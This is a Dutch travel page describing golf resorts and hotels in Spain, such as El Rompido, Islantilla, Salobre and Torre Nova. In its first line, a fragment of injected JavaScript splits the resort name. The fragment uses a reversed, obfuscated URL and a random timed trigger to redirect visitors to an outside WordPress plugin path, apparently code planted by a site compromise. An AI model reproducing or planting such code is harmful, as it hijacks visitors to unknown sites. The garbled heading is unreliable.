El Rompitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do Golf&Beach Resort
Het Precise Resort El Rompido-The Hotel ligt op een 36-holes golfbaan met uitzicht op de riviermoerassen van Piedras. Het hotel bevindt zich in een rustige omgeving en heeft een spa en een buitenzwembad.De lichte, mooi ingerichte kamers van dit hotel bevinden zich in prachtige tuinen. De kamers beschikken over een balkon, waarvan vele uitzicht op zee bieden. Iedere kamer beschikt over satelliettelevisie en een minibar.
Het Islantilla Golf Resort is een exclusief complex binnen het golfterrein Islantilla, slechts 800 meter van het strand van Islantilla. Het biedt gratis internet, 4 restaurants, een spa en een seizoensgebonden buitenzwembad. Het Islantilla-golfterrein heeft 27 holes. Er zijn ruim voldoende oefen faciliteiten.
Met het Salobre Golf Resort, legt de Dream Destination een bijzondere klemtoon op exclusieve privévilla’s op het golfterrein.
AC Hotel Palau de Bellavista by Marriott ligt op 10 minuten lopen van het oude centrum en de kathedraal van Girona. Het beschikt over kamers met een minibar en biedt 24 uur per dag roomservice. De bar en buitenrestaurant op het dakterras bieden een indrukwekkend uitzicht.
Dit is van origine een Spaanse boerderij, Finca genoemd. Het is nu een karakteristieke Andalusisiche "Country Inn" die de originele charme heeft behouden.
Het complex heeft 18 appartementen die in een fraaie tropische tuin liggen met uitzicht op het zwembad. Er is een clubhuis met klein restaurant.
In het rustige achterland van Barcelona, in het middeleeuwse dorpje La Torre de Claramunt, ligt het landgoed Torre Nova. U bent er thuis in het echte Spanje. Jacqueline Brakel en Geert van Heijningen maken van uw golfvakantie een 'experiència autèntica'.